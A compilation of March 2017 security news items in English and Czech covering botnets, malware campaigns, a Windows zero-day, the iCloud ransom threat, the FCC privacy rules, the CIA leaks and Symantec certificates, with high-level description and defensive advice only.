Operators of the GiftGhostBot botnet launch brute-force attacks against retailer's website to check potential gift card account numbers at a rate of about 1.7 Million numbers per hour, and request the balance for each number.

Once the gift card account number and its balance is correctly matched, the fraudsters automatically get logged into that account without any authentication.
The cyber criminals then record those account numbers to either resell them on the Dark Web or use them to purchase goods.
What's interesting? The beauty of stealing money from gift cards, according to the security firm, is that "it is typically anonymous and untraceable once stolen."
Like any other sophisticated cyberattack, the GiftGhostBots botnets are also being distributed across the global hosting providers, internet service providers, and data centers, executing JavaScript mimicking a regular browser to evade detection.
"Like most sophisticated bot attacks, GiftGhostBot operators are moving quickly to evade detection, and any retailer that offers gift cards could be under attack at this very moment," said Distil Networks CEO Rami Essaid. "To prevent resources from being drained, individuals and companies must work together to prevent further damage."
Here's How to Protect Yourself:
Since retailers are not exposing consumers' personal information, users are strongly recommended to remain vigilant.
Check your gift card balances and take a screenshot of the page showing your account balance as proof.
Don’t forget your gift cards and leave it unused. Treat them like cash and use them to prevent fraud.
Contact retailers and ask for more information if facing problems with cards.
Inserting a CAPTCHA can help retailers prevent many bots (while not the sophisticated ones but many).
Retailers should monitor their web traffic regularly to identify any attack. While sophisticated bots constantly rotate their IP address to evade detection, Distil has provided known IP addresses involved in the attack.
Retailers can also put rate limits on requests to the check your balance page.
For more technical details on the GiftGhostBot botnet, you can head on to the blog post published by Distil Networks.


Could Killing of FCC Privacy Rules Lead to End of Net Neutrality?

26.3.2017 securityweek Privacy
The Senate on Thursday voted 50-48 to overturn new FCC rules that would prevent ISPs from monetizing customers' information without their consent. The rules, passed during the Obama administration in October 2016, were due to come into force earlier this month, but were delayed by new Republican chairman Ajit Pai.

This delay provided time for Republican senators to propose a Joint Resolution to 'disapprove' the new FCC rules. S.J. Res. 34 was adopted along party lines. It 'disapproves' the FCC rule "Protecting the Privacy of Customers of Broadband and Other Telecommunications Services... and such rule shall have no force or effect."

It is expected that this will be confirmed by Congress, which could then further prevent the FCC from issuing substantially similar rules in the future. However, many commentators also consider this to be the first step in dismantling the net neutrality rules imposed during the Democrat Obama administration.

Internet Privacy and ISP DataThe debate goes back to the Open Internet Order of 2010, and the subsequent reclassification of ISPs as common carriers in 2015. This was necessary to bring ISPs under the FCC's regulatory regime in order to enforce net neutrality -- but it also meant that the FCC was responsible for privacy enforcement.

The ensuing privacy rules were adopted on October 27, 2016, and were designed "to give broadband consumers increased choice, transparency, and security over their personal data so consumers are empowered to decide how data are used and shared by broadband providers."

In short, the FCC grabbed regulatory control of ISPs from the FTC in order to enforce net neutrality, but in doing so also became responsible for privacy. The effect was to place different internet giants (such as Comcast, Verizon and AT&T) under different regulations to others (such as Google and Facebook). The latter are allowed to monetize customer data, while the former are not.

The ISPs are not happy with this, and have been complaining and lobbying to get it reversed. "The unfortunate result of the FCC's extreme regulatory proposals," wrote Comcast in March 2016, "will be more consumer confusion and less competition -- and a bunch of collateral damage to innovation and investment along the way. This is most disappointing because it is entirely avoidable, since the Administration, the Federal Trade Commission, and others have examined this issue and marketplace for many years and have reached very different conclusions."

The Internet & Television Association trade group (NCTA) issued a new statement Thursday: "We appreciate today's Senate action to repeal unwarranted FCC rules that deny consumers consistent privacy protection online and violate competitive neutrality. The Senate's action represents a critical step towards reestablishing a balanced framework that is grounded in the long-standing and successful FTC privacy framework that applies equally to all parties operating online..."

The ISPs would like the marketplace to be unified under the regulatory control of the FTC -- or at least to have no more regulatory control than that placed on other internet service companies. But ISPs provide a completely different service, and control the internet choke points. The Electronic Frontier Foundation (EFF) points out 'Five Creepy Things Your ISP Could Do if Congress Repeals the FCC's Privacy Protections'. These include selling data to marketers, hijacking searches, inserting ads, pre-installing their own spyware on phones, and injecting 'undetectable, undeletable tracking cookies in all of your HTTP traffic'. In each case, EFF provides examples of ISPs who have already done this.

It is noticeable that new UK laws focus on using the ISPs to exert the government's new surveillance (Investigatory Powers Act) and censorship (the Digital Economy Bill) capabilities. The former ensures that the government will simply be able to take the internet data that US ISPs are likely to be able to sell, while the latter will enable the government to use the ISPs to block public access to websites it deems unsuitable (as it already does in a limited form with sites such as The Pirate Bay). Both laws would almost certainly be struck down by the European Courts as unconstitutional if the UK remained within the European Union.

What isn't yet certain is whether disapproving the FCC's privacy rule in the US is really the first step towards dismantling net neutrality. Chairman Pai can legitimately claim that he had no role in this (other than providing time for it to happen). It is the Senate rather than the FCC that has done so.

Net neutrality has been in force since the FCC's Open Internet Order and the reclassification the ISPs imposed neutrality. It has already stood the test of time and would probably require government legislation rather than FCC action to reverse it.

Writing in the LegalMatch law blog, Jonathan Lurie comments, "If the rule was to be fully stripped away, it would most likely involve an act of Congress explicitly doing so. However, Congress and the Trump administration do not seem to be making such legislation a priority." Instead, he suggests that, "it has been implied that [chairman Pai's FCC] would likely see changes allowing ISPs to prioritize data in certain situations -- basically creating carveouts to the general rule. There's no particular indication as to what these carveouts might include, but it is easy to imagine a situation where exceptions could swallow the rule."

The irony in the current situation is that ISPs have argued that the FCC privacy rules distort the advertising market and hamper innovative new approaches, while supporters of net neutrality claim that it will enable innovative companies with new approaches to internet services.


The Winnti Gang continues its activity and leverages GitHub for C&C Communications
26.3.2017 securityaffairs Virus

Trend Micro discovered the Chinese threat actor Winnti has been abusing GitHub service for command and control (C&C) communications.
Security experts at Trend Micro continue to monitor the activities of the Chinese Winnti hacker group, this time the hackers have been abusing GitHub for command and control (C&C) communications.

“Recently, the Winnti group, a threat actor with a past of traditional cybercrime -particularly with financial fraud, has been seen abusing GitHub by turning it into a conduit for the command and control (C&C) communications of their seemingly new backdoor (detected by Trend Micro as BKDR64_WINNTI.ONM).” reads the analysis published by Trend Micro.

“Our research also showed that the group still uses some of the infamous PlugX malware variants—a staple in Winnti’s arsenal—to handle targeted attack operations via the GitHub account we identified.”

Winnti Github

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially-motivated and was mostly involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry, the majority of the victims is located in Southeast Asia.

Malware researchers at Trend Micro discovered that that malware connected to a certain GitHub account in order to get the indication of the C&C servers.

The group continues using the PlugX RAT for its attacks along with an alleged new backdoor tracked as BKDR64_WINNTI.ONM.

The malicious code checks an HTML page stored in a GitHub project that contains an encrypted string, this string includes the IP address and port number for the Command and Control server.

The GitHub project used by the Winnti gang was created in May 2016 and its first usage for C&C communications is dated back August 2016. Experts believe the GitHub account was likely created by the attackers themselves and not hijacked from its original owner.

The experts observed nearly two dozen C&C server IP and port combinations in the period between August 17 and March 12. The C&C servers were located in the United States, and two of them in Japan.

The recently discovered Winnti backdoor uses a loader that leverages a modified version of a Microsoft registry tool (loadperf.dll) and the WMI performance adapter service in Windows (wmiAPSrv).

The loader imports and decrypts the main payload and then injects it into the svchost.exe. The payload is then loaded into memory.

“Abusing popular platforms like GitHub enables threat actors like Winnti to maintain network persistence between compromised computers and their servers, while staying under the radar,” concludes Trend Micro. “Although Winnti may still be employing traditional malware, its use of a relatively unique tactic to stay ahead of the threat landscape’s curve reflects the increased sophistication that threat actors are projected to employ.”


CVE-2017-0022 Windows Zero-Day flaw used by AdGholas hackers and it was included in Neutrino EK
26.3.2017 securityaffairs Exploit

The recently patched CVE-2017-0022 Windows Zero-Day vulnerability has been exploited by threat actors behind the AdGholas malvertising campaign and Neutrino EK since July 2016.
Microsoft has fixed several security flaws with the March 2017 Patch Tuesday updates. According to security experts at Trend Micro, the list of fixed vulnerabilities includes three flaws that had been exploited in the wild since last summer.

One of the vulnerabilities, is an XML Core Services information disclosure vulnerability, tracked as CVE-2017-0022, that can be exploited by attackers by tricking victims into clicking on a specially crafted link.

“An information vulnerability exists when Microsoft XML Core Services (MSXML) improperly handles objects in memory. Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker could host a specially-crafted website that is designed to invoke MSXML through Internet Explorer. However, an attacker would have no way to force a user to visit such a website. Instead, an attacker would typically have to convince a user to either click a link in an email message or a link in an Instant Messenger request that would then take the user to the website.”

The flaw was discovered by a joint investigation conducted by security researchers at Trend Micro and ProofPoint, it was reported to Microsoft in September 2016.

Who did exploit the CVE-2017-0022 flaw?

According to the security researchers at Trend Micro, the zero-day vulnerability has been exploited in the AdGholas malvertising campaign since July 2016. The exploit code of the flaw was added to the Neutrino exploit kit in September 2016.

The threat actor behind the AdGholas malvertising campaign was notable for its use of steganography and careful targeting of the massive volume of malicious ads and impressions and its ability to avoid detection of researchers.

Initially the attackers leveraged the CVE-2016-3298 and CVE-2016-3351 flaws to avoid detection, now the experts at TrendMicro speculate they used the CVE-2017-0022 flaw for the same purpose.

“This vulnerability was used in the AdGholas malvertising campaign and later integrated into the Neutrino exploit kit. CVE-2017-0022 likely replaced the similar CVE-2016-3298 and CVE-2016-3351 vulnerabilities from the same campaign, which were addressed by previous patches.” reads the analysis published by TrendMicro.

cve-2017-0022 malvertising exploit

“An attacker exploiting CVE-2017-0022 could use phishing attacks to lure potential targets to malicious websites. Successful exploitation of this vulnerability could allow a cybercriminal access to information on the files found in the user’s system.” explained the experts from TrendMicro. “In particular, the attacker would be able to detect if the system is using specific security solutions—especially ones that analyze malware.”

Trend Micro has published a detailed analysis of the CVE-2017-0022 flaw and of the attack chain that exploits it in a malvertising campaign leveraging the Neutrino exploit kit.


Malware posing as Siemens PLC application is targeting ICS worldwide
26.3.2017 securityaffairs ICS

Findings of the MIMICS project conducted by Dragos Threat Operations Center show a malware posing as Siemens PLC application is targeting ICS worldwide.
After the disclosure of the Stuxnet case, the security industry started looking at ICS malware with increasing attention. A malware that infects an industrial control system could cause serious damages and put in danger human lives.

Ben Miller, Director of the Dragos Threat Operations Center, conducted an interesting research based on data regarding ICS incidents collected over the last 13+ years.

The project studied modern industrial control systems (MIMICS) from completely public datasets.

“In this project the Dragos, Inc. team looked at public data sources such as VirusTotal to identify malware and (in many cases) legitimate ICS files being uploaded to encourage a more nuanced discussion around security in the modern ICS.” explains Dragos CEO, Robert M. Lee.

Miller discovered ~30k samples of infected ICS files and installers dating back to 2003. The most dangerous threats are malware that quickly spread like Sivis, Ramnit, and Virut.

The experts confirmed that the infections of ICSs are not rare, they highlighted that there are only three publicly showcased pieces of ICS tailored malware: Stuxnet, Havex, and BlackEnergy2. There have been rumors around another couple of ICS tailored malware exploited in active campaigns, some of them studied by researchers at IronGate.

One of the most interesting findings of the MIMICS research is that multiple variants of the same malware disguised as software for Siemens programmable logic controllers (PLCs) has been detected 10 times over the last 4 years. The last time this specific ICS malware was discovered was early March.

“Starting in 2013 there were submissions from an ICS environment in the US for Siemens programmable logic controller (PLC) control software. The various anti-virus vendors were flagging it as a false positive initially and then eventually a basic piece of malware.” continues Lee. “Upon our inspection, we found that variations of this file and Siemens theme 10 times over the last 4 years with the most recent flagging of this malicious software being this month in 2017. In short, there has been an active infection for the last 4 years of an adversary attempting to compromise industrial environments by theming their malware to look like Siemens control software. The malware is simply crimeware but has seemingly been effective.”

Researchers encurage asset owners and operators to implement simple best practices such as network security monitoring in order to protect their environments, for example software supply chain validation can be sufficient to drastically a concerning attack vector.

“The last finding we had was driven by the hypothesis that many of the IT security teams and security technologies that are not used to ICS environments may be flagging legitimate ICS software as malicious where it could be inappropriately placed in public databases.” concludes the report.


Experti z Applu s hackery komunikovali, ale výkupné odmítli zaplatit

25.3.2017 Novinky/Bezpečnost Apple
Bezpečnostní experti společnosti Apple byli ve spojení s hackery ze skupiny Turkish Crime Family, kteří vyhrožují, že ze služby iCloud smažou data stovek miliónů uživatelů. Upozornil na to server Motherboard s tím, že experti zaujali vůči kyberzločincům nekompromisní postoj. Vyjednávat prý nebudou.
Hackeři dali společnosti Apple jasné ultimátum. Buď zaplatí do 7. dubna požadované výkupné, nebo budou data více než 625 miliónů uživatelů služby iCloud smazána. Počítačoví piráti se totiž přesně takového množství přihlašovacích údajů zmocnili. 

E-mailová komunikace, kterou server Motherboard získal, však dokazuje, že americký počítačový gigant se vyjednávat rozhodně nechystá.

Bezpečnostní experti Applu totiž nejprve požadovali po útočnících vzorek dat, který by skutečně dokazoval, že jsou uživatelé v ohrožení. Ten kyberzločinci skutečně zaslali. Místo zaplacení výkupného však následně pracovníci amerického počítačového gigantu začali hackerům sami „vyhrožovat“.

Upozornili je na to, že společnost počítačové piráty nijak neodměňuje, pokud svým jednáním porušují zákon. Dále podotkli, že celou komunikaci archivovali a postoupili ji orgánům činným v trestním řízení.

Nebojte se, vzkazuje Apple
V pátek pak zástupci podniku s logem nakousnutého jablka vydali oficiální prohlášení, podle kterého se uživatelé nemají čeho obávat. Tvrdí, že hackeři disponují jen daty, která pocházejí z útoku na síť LinkedIn v roce 2012.

V ohrožení by tak podle výše uvedeného měli být teoreticky pouze uživatelé, kteří používají na službě iCloud stejné heslo jako na LinkedInu a za posledních pět let si ho ještě nezměnili.

Server ZDNet nicméně upozornil na to, že jakékoliv bagatelizování hrozby není na místě. Podle vzorku dat hackerů, který měli redaktoři k dispozici, jsou uživatelé skutečně v ohrožení. V tuto chvíli tak není zcela zřejmé, zda je hrozba pro uživatele reálná, či nikoliv. V každém případě by si pro jistotu měli uživatelé svá data z iCloudu zálohovat.

Jak funguje iCloud
Služba iCloud nabízí uživatelům možnost ukládat kontakty, zprávy, fotografie a další soubory automaticky na vzdálený server (cloud). To se hodí především v případě, kdy mobil nebo tablet ztratíte. Do nového přístroje jednoduše zadáte své přístupové údaje a všechna data máte okamžitě zpět, o nic nepřijdete.

Jenže jak je z řádků výše patrné, cloud představuje také jisté riziko, na které bezpečnostní experti pravidelně poukazují již několik let. Tím, že data nemáte přímo u sebe, může se k nim dostat i někdo cizí. Stačí znát váš e-mail a heslo.

A právě to se údajně podařilo hackerské skupině u stovek miliónů účtů. Počítačoví piráti tak nyní požadují po americkém počítačovém gigantu výkupné. Pokud jej zástupci Applu nezaplatí do 7. dubna, jak bylo uvedeno výše, kyberzločinci podle serveru Neowin data uživatelů smažou.

Útočníci výkupné neustále zvyšují. Nejprve chtěli po americkém počítačovém gigantu 75 000 dolarů (1,9 miliónu korun). Už pár dní poté však požadovali dvojnásobek. Až do dubna se má částka každé tři dny zvyšovat, pokud Apple nezaplatí.


Chraňte svá data i při využití cloudu

25.3.2017 SecurityWorld Cloud Computing
Přestože je cloud zabezpečený, nezaručuje imunitu vůči únikům dat. Nyní, když se cloud rychle stává mainstreamem v IT, musejí firmy přemýšlet více kriticky o tom, jak posílit své zabezpečení nad rámec výchozí infrastruktury zabezpečení zajišťované příslušnými providery cloudových služeb.

Poskytovatelé klasického cloudu se snaží nabízet robustní bezpečnostní opatření. Obvykle obsahují šifrování na straně serveru, řízení uživatelů, schopnosti obnovy dat a možnosti smazání zařízení pro ochranu souborů v cloudu.

Přesto však navzdory všem těmto opatřením existuje významná, ale málo diskutovaná mezera v zabezpečení cloudu, která souvisí s dalším významným trendem mobilní práce – s používáním vlastních zařízení pro firemní účely (BYOD).

Podle průzkumu v současnosti více než 40 % zaměstnanců v USA používá osobní chytré telefony, tablety a Flash disky pro pracovní účely a 83 % připouští, že dávají přednost cloudovým aplikacím před jejich ekvivalentem v interních infrastrukturách, takže je pravděpodobně budou vyhledávat.

Ať už však zaměstnavatel výslovně dovoluje či zakazuje využívání cloudu a aplikací, přetrvává stejný problém: Jakmile dojde k synchronizaci souborů s mobilním zařízením, což je, přiznejme si to, hlavním a prvořadým důvodem používání cloudu, dochází k situaci, kdy výchozí šifrování poskytovatele zmizí a soubory z cloudu přestanou být chráněné.

Každý rok dojde ke ztrátě mnoha desítek milionů smartphonů. Přidejme k tomuto počtu ztracené a odcizené tablety, Flash disky a notebooky a hned je dobře vidět, jak jednoduše se mohou nešifrovaná data dostat do nepovolaných rukou.

Ztracená a odcizená zařízení jsou jednou z hlavních příčin úniků dat, a to převážně z důvodu absence šifrování v těchto přístrojích.

Dobrou zprávou ale je, že i navzdory existujícím nedostatkům v zabezpečení cloudu je ochrana souborů možná.

Existuje totiž několik jednoduchých způsobů, jak maximalizovat přínos výchozí infrastruktury zabezpečení cloudu a udržet podnikání v bezpečí a kompatibilní s libovolným počtem regulačních předpisů.

1. Šifrování dat na úrovni souborů

Již nadále nestačí chránit jen hranici, což v současné době v podstatě znamená spoléhání se pouze na šifrování na straně serveru.

Nepostačuje ani pouhé šifrování souborů v úložišti, což by stačilo, pokud by váš tým nesynchronizoval žádné soubory do cloudu, ale to není v dnešním ekosystému založeném na cloudu už v podstatě uskutečnitelné.

Šifrování na úrovni souborů ale chrání samotná data (spíše než místo, kam se ukládají) ještě dříve, než se dostanou do cloudu. To znamená, že soubory zůstanou zašifrované, ať už putují kamkoli včetně mobilních zařízení. Přístup k jejich obsahu tak mohou získat jen oprávnění uživatelé.

Nasazení tohoto druhu šifrování k posílení výchozích opatření poskytovatelů cloudu je rozhodující pro udržení finančních informací, osobních údajů a duševního vlastnictví v bezpečí, a to zejména na pracovištích podporujících BYOD a tam, kde členové týmu pracují vzdáleně nebo na cestách.

2. Nasazení systémů CASB (Cloud Access Security Brokers, zprostředkování zabezpečeného přístupu do cloudu)

V současné době využívá CASB jen 5 % firem, ale studie předpovídají, že toto využití prudce stoupne na 85 % do roku 2020.

CASB poskytuje jednotné řešení zabezpečení, které umožňuje správcům týmů z jednoho místa detekovat rizika úniků dat, nasazovat ochrany a vynucovat bezpečnostní protokoly.

Řešení CASB také umožní zaměstnancům i nadále používat poskytovatele cloudu, na které jsou již zvyklí, ale dává správcům potřebné prostředky pro sledování způsobu sdílení souborů.

CASB neumožní únik dat přes mezery a zavádí velkou viditelnost, což je nutné, pokud je potřeba přesně vědět, kam se ukládá citlivý obsah a kdo k němu má přístup.

Jak se data v cloudu stále více rozrůstají, začíná CASB používat stále více firem, aby udržely krok s informacemi a zaručily jejich efektivnější ochranu.

3. Oddělení šifrovaného obsahu od klíčů

Pokud jsou šifrovací klíče uložené odděleně od obsahu, nemůže hacker získat přístup k obsahu, jestliže těmito klíči nedisponuje.

Nasaďte řešení, které zajistí tuto separaci a umožní oddělení IT udržet správnou „hygienu zabezpečení“. Tento způsob chrání vaše data před únikem i v případě, že dojde ke kompromitaci poskytovatele cloudu.

Cloud se rychle stává nutností pro podniky, které chtějí udržet krok se současnými pracovními postupy. Pouhé nasazení cloudových řešení však nestačí.

Podniky si musejí udělat vlastní průzkum a najít správná vylepšení, která adekvátně posílí jejich výchozí protokoly zabezpečení.

Šifrování na úrovni souborů, CASB a separace klíčů od obsahu jsou skvělými způsoby, jak začít, abyste své nejcitlivější soubory udrželi v bezpečí.


Spear phishing campaign targeted Saudi Arabia Government organizations
25.3.2017 Securityaffairs Phishing

Security researchers at MalwareBytes have uncovered a spearphishing campaign that targeted Saudi Arabia Government organizations.
Security experts at MalwareBytes have spotted a new spear phishing campaign that is targeting Saudi Arabia governmental organizations.

According to the experts, the campaign already targeted about a dozen Saudi agencies. Attackers used weaponized Word document and tricked victims into opening them and enabling macros.

Saudi Arabia Government

The document is in Arabic language, if the victim opens it up, it will be infected and the phishing document is sent to their contact via Outlook inbox.

The malicious payload is embedded in the macro as Base64 code and leverages the certutil application for decoding into a PE file that is finally executed.

The binary dropped on the infected machine is coded in .NET and its code is encrypted but not obfuscated. The malware was designed to steal information from the victims and upload it to a remote server.

“Decrypting it we can see the main payload (neuro_client.exe renamed to Firefox-x86-ui.exe here) and two helper DLLs” reads the analysis published by MalwareBytes.

Saudi Arabia Government

The malicious code gains persistence via the Task Scheduler.

MalwareBytes is still monitoring the campaign and plans to provide further information in the future.

I suggest reading the analysis that also includes the IoCs.


Veselé Vánoce aneb Jak ransomware zašifroval firmám z Prahy data před účetní uzávěrkou

24.3.2017 Lupa.cz Viry
Další příběh o ransomwaru má nakonec šťastný konec. Jen obnovení dat a doplnění informací z nekompletních záloh ale zabralo měsíc.
Náš článek z konce loňského roku o tom, jak jednu malou zdravotnickou firmu v Brně napadl ransomware, vyvolal řadu debat. Hodně lidí se podivovalo především nad tím, že si někdo v podniku stále nechá dělat IT od „syna souseda od vedle“ a kvůli tomu zvýší bezpečnostní rizika. Dnešní příběh je z Prahy a ukazuje, že ransomware může zatopit i menší firmě plné technicky zdatnějších lidí.

Přesněji řečeno jde o dvě firmy s jedním majetkovým propojením. Jedna z nich se soustředí na obchodování s mobilními technologiemi a zaměstnává kolem patnácti lidí, druhá pak provozuje restauraci a práci dává asi osmi lidem.

Tyto propojené společnosti už řadu věcí kolem informačních technologií v minulosti přesunuly „ven“, fungují například na e-mailových službách od Googlu. Jedna věc ale i z historických důvodů zůstávala – server vytvořený z obyčejného počítače s Windows 10 běžící v kancelářích. Jeho jediným účelem bylo provozovat účetní software Pohoda.

Veselé Vánoce
Koncem roku 2016, někdy kolem Vánoc, když přišel čas na účetní uzávěrku, se to stalo. Asi šest lidí se k účetnímu serveru připojuje přes vzdálenou plochu (RDP), tentokrát ale nebyla k dispozici žádná data. Objevila se pouze hláška, že informace na serveru jsou zašifrovány, a pokud je chce firma dostat zpět, má zaplatit.

Ransomware Merry X-Mas
Autor: Check Point Software Technologies
Ransomware Merry X-Mas
Náš předchozí příběh z Brna ukazoval, jak složitě se k informacím o ransomwaru dostávají lidé bez zkušeností s IT, v pražském podniku ale několik zaměstnanců vědělo, o co jde. Začali tedy hledat informace na internetu. Zjistili jenom to, že v té době k dotyčnému malwaru ještě neexistoval veřejně dostupný klíč pro dešifrování.

TIP: Zaplať, nebo nedostaneš data. Příběh o tom, jak lehce vám může zatopit ransomware

„Došli jsme k tomu, že jde o typ ransomwaru, ke kterému zatím klíče nejsou. Začali jsme tedy řešit, jestli máme zaplatit,“ popisuje pro Lupu pan D. „To ale moc nikam nevedlo. Jeden kolega našel, že zrovna tito útočníci po zaplacení skutečně data odšifrují, druhý kolega ale našel přesný opak. Takže jsme se radši rozhodli nezaplatit.“

Jen toto vyhledávání informací zabralo několik dnů. Následovalo rozhodnutí, že si firmy obnoví data ze zálohy. Ta naštěstí byla uložena na hostovaném serveru mimo kanceláře. Jenže například restaurace přišla o účetní data za půl roku a zálohy rozhodně nebyly prováděny na denní či týdenní bázi.

Podíl ransomwaru na trhu
Autor: Check Point Software Technologies
Podíl ransomwaru na trhu
Příběh má relativně dobrý konec, data se nakonec podařilo znovu poskládat dohromady. Nicméně zaměstnancům to zabralo měsíc času a náklady se odhadem pohybovaly mezi 50 až 60 tisíci. Mimochodem, dešifrovací nástroj na tento typ ransomwaru už dnes existuje.

Dvojnásobný růst ransomwaru
Server s Windows 10 a Pohodou ve dvou vinohradských firmách běží i nadále. Jsou tu ovšem některé změny: je třeba za firewallem, předělaly se porty a je nastavené pravidelné zálohování dat mimo kanceláře. V reakci na problém s ransomwarem firmy také přesouvají další služby do cloudu. „I jako malá firma vidíme cloud jako více bezpečný. Nezaměstnáváme odborníky na kybernetickou bezpečnost a naše starosti jsou jinde,“ říká pan D.

Vývoj ransomwaru na Androidu
Autor: ESET
Vývoj ransomwaru na Androidu
To, jak se ransomware na server dostal, firmy do detailů nezjišťovaly. Některé typy ransomwaru každopádně útočí právě přes RDP, které se k připojování ve firmě používá. „Také je možné, že tam [na serveru] šéf něco udělal,“ říká pan D. Ransomware se jinak šíří různými cestami (PDF, přílohy, EXE soubory a tak dále) a kopíruje metody tradičního malwaru.

Podle společnosti Check Point se počet odhalených útoků přes ransomware v druhé polovině loňského roku zdvojnásobil a s podobným trendem lze počítat i do budoucna. Ransomware už tvořil 10,5 procenta útoků (více ve studii). Už dřívější průzkumy ukázaly, že jde nejspíše o nejvýdělečnější malware v historii, výkupné totiž platí i tři až pět procent napadených firem. Ransomware už má tisíce variant a hlavní rodiny se postupně modifikují a vyvíjejí.

Největší podíl mezi ransomwary má podle Check Pointu Locky (41 procent) následovaný Cryptowallem (27 procent) a Cerberem (23 procent). Ransomware už se také dá pronajímat jako služba (malware-as-a-service).

Společnost ESET zase upozorňuje, že se navyšuje i využívání ransomwaru v rámci mobilních zařízení, zejména Androidu. Objevují se zejména takzvané lockscreeny, které uzamknou úvodní obrazovku a tradiční zašifrování dat. Podle ESETu ransomware útoky na Android rostou rychleji než útoky jako celek (více ve studii). Ransomware už se objevuje také na chytrých televizích s Androidem.


Ukrajinští hackeři prodávají warez pro traktory a farmáři z Nebrasky jásají
24.3.2017 Živě.cz Kriminalita
Počítače už dávno pronikly i do tradičních hloupých strojů, a tak se dnes v ajťáka musí čas od času proměnit i automechanik. Komputerizace strojů se snaží obchodně využít i jejich výrobci, o čemž svědčí i netradiční kauza ze Států, která se týká traktorů John Deere.

Špičkoví hackeři útočili na prohlížeče. Chrome odolal, ale Edge je tragédie
Tamní farmáři při nákupu podepisují docela přísné podmínky, které umožňují výrobci traktor na dálku i vypnout, pokud dojde k nestandardnímu zásahu do jeho výbavy. Ze stejného důvodu musejí farmáři používat jen oficiální náhradní díly a servis.

Jenže to se jim nelíbí, není totiž zdaleka nejlevnější a jsou s ním spojené i prodlevy, než dorazí certifikovaný technik. V krajním případě se rozbitý traktor a prodlevy mohou podepsat na sklizni a tedy i nižších příjmech, ze kterých však farmář na základě smlouvy nesmí vinit výrobce.

Situace využili ukrajinští hackeři a začali na internetu nabízet tučně zpoplatněné cracky, které tyto kontroly výrobce obejdou a farmář bude moci jak upravit konfiguraci firmwaru, tak použít libovolnou náhradní součástku.

Pomalu se tedy dostáváme do éry, kdy se toto softwarové patchování přenáší ze světa domácích počítačů i do míst, kde to bylo ještě nedávno nemyslitelné. Na stranu druhou ale ruku v ruce s tím vzroste i riziko softwarové nákazy, a tak budou možná brzy součástí nejrůznějších botnetů i traktory z Nebrasky.


Další várka úniků ze CIA: „Temná hmota“ a „sonický šroubovák“ jsou postrachem jablíčkářů
24.3.2017 Živě.cz BigBrother

Po dvou týdnech je tu další várka uniklých dokumentů
Tato nepotěší majitele macbooků
CIA má celý balík nástrojů na jejich odposlech

Skupina Wikileaks dodržela slib a po první velké várce tajných dokumentů s kódovým označením Vault 7: Year Zero před pár hodinami vypustila do světa další a tentokrát o něco menší balík Dark Matter, který se skládá z několika návodů pro zaměstnance americké zpravodajské agentury CIA.
A těmi zaměstnanci samozřejmě nemáme na mysli uklízečky a kuchařky v kantýně, ale specialisty a operativce, kteří používají nejrůznější kybernetické zbraně k odposlechům a sledování svých cílů pomocí nejrůznějších odhalených slabin na počítači.

Stejně jako minule i tentokrát se jedná spíše o staré zranitelnosti, které budou touto dobou už dávno opravené, nicméně lze předpokládat, že CIA své nástroje průběžně vylepšuje tak, jak její inženýři objevují nové a nové zranitelnosti.

DarkSeaSkies

Na stranu druhou, ani oni nejsou tak dokonalí jako hackeři z filmů, a tak se inspirují na nejrůznějších bezpečnostních konferencích. To se týká třeba balíku nástrojů DarkSeaSkies, jehož komponenty se až podezřele podobají útoku na EFI zavaděč v jablečných počítačích, jehož postup byl zveřejněn na konferenci Black Hat 2012. Zdá se tedy, že se CIA inspirovala právě zde.
DarkSeaSkies se skládá ze tří částí, přičemž ta hlavní, DarkMatter, podle které Wikileaks pojmenoval i tuto várku úniků, představuje speciální ovladač, který se bez vědomí uživatele usadí v zavaděči jablečného počítače a nainstaluje zbývající komponenty. Tou první je SeaPea, která se usadí v jádře Mac OS 10.5, a tou druhou pak NightSkies.

Dohromady umožní prakticky kompletně ovládnout jablečný systém, aniž by to jeho majitel vůbec zaregistroval. To znamená, že agenti mohli odposlouchávat a posílat vlastní příkazy do macbooků s danou verzí operačního systému, do kterých se jim podařilo dostat jejich malware ať už ručně, nebo běžnou infekční cestou skrze nějakou další zranitelnost třeba ve webovém prohlížeči.

Sonic Screwdriver

Dalším zajímavým nástrojem z Langley je i sonický šroubovák, který pro změnu používá k průniku do systému zranitelnosti thunderboltového adaptéru pro ethernet. V jeho firmwaru je totiž speciální kód, který umožní instalaci dalšího ovládacího implantátu pojmenovaného Der Starke, který má být vylepšenu verzí malwaru Triton.

Klepněte pro větší obrázek
Thunderboltový adapter pro ethernet. CIA používala upravenou verzi s malwarem uvnitř jeho firmwaru.

Ale dost slovíčkaření, k instalaci Tritonu je třeba mít patřičná práva a Sonic Screwdriver to společně s Der Starke obejdou. Stačí, aby byl a v macbooku během startu připojený onen zákeřný zavaděč a systém se pak sám nakazí i bez znalosti hesla. CIA tedy musí mít fyzický přístup k laptopu, instalace je však nejspíše velmi rychlá, takže stačí jen chvilka.

Jakmile se to podaří, agenti mohou opět odposlouchávat dění v počítači a spouštět vlastní kód.
A to je protentokrát vše. Na webu Wikileaks najdete uniklé úryvky dokumentací jednotlivých nástrojů s bizarními kódovými jmény, které se tentokrát orientují výhradně na jablečnou platformu. Jedná se sice o starší útoky, které už dnes nemusejí být k ničemu, podstatné je však to, že s nimi CIA operovala v době, kdy to mělo svoji cenu. Zároveň je skoro jisté, že dnes operativci z Langley útočí zase na aktuální jablečnou platformu.


Symantec chyboval s EV certifikáty, prohlížeče jim přestanou důvěřovat
24.3.2017 Root.cz Zabezpečení

Společnost Symantec dostatečně nezabezpečila svůj proces vydávání certifikátů, vyplývá z vyšetřování Googlu. Ten proto plánuje částečné odebrání důvěry v Chromu a vyzývá k tomu další prohlížeče.
Vývojový tým prohlížeče Google Chrome představil svůj úmysl potrestat společnost Symantec, konkrétně její certifikační autoritu. Na začátku roku se totiž objevila podezření, že praktiky společnosti při vydávání certifikátů nebyly takové, jaké by měly být. Zejména co se týče certifikátů s rozšířeným ověřením (EV), tedy ověřením samotné společnosti.
Google proto podnikl vyšetřování v podezření se potvrdila. Problém je hlavně v tom, že Symantec umožnil přístup do své infrastruktury několika dalším stranám a dostatečně na ně nedohlížel. Google se domnívá, že cca 30 tisíc certifikátů tak bylo vystaveno v rozporu se základními pravidly.

Trest: rychlejší vypršení certifikátů
